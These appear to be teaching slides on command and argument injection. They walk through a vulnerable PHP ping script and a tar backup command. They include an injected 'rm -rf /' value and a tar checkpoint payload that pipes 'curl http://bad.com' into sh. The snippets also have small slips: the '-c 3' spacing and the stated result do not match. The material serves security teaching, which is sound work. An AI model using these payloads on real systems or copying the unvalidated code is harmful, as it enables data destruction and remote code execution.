Argument Exploitation

The application runs the program as part of normal operation.

• Example: create a backup of a database to a compressed file.

A crafted payload may execute user-controlled commands before or after the expected program, exploiting the tool arguments.

• The programs will mostly execute.

• But other programs may be called.

Examples

1.

<?php
    $host = $_POST["hostname"];
    $command = 'ping -c 3' . $host;
    system($command);
?>

The developer expects an IP address or hostname.

• But doesn't do any kind of validation.

Custom payload can inject commands: hostname=localhost; rm -rf /

• Result is 2 commands: ping -c localhost; rm -rf /

2.

The application asks user for the name of the backup file and backups a home directory:

tar -jcf user_backup_name.tar.bz2 /home/user

A user provides the following name:

.tar.bz2 --checkpoint=1 --checkpoint-action=exec=‘curl
http://bad.com|sh’ /etc/issue; #

which results in the following command:

tar -jcf user_.tar.bz2 --checkpoint=1 --checkpoint-
action=exec=‘curl http://bad.com|sh’ /etc/issue; #
/home/user

tar

The tar tool creates compressed files from archives, folders, and generic data.

Because the process can take a long time, it allows for checkpoints where actions are executed, usually to notify users.

Each every NUMBERth record executes a checkpoint action.

The checkpoint action is:

• Get a file from http://bad.com

• Execute the file as a bash script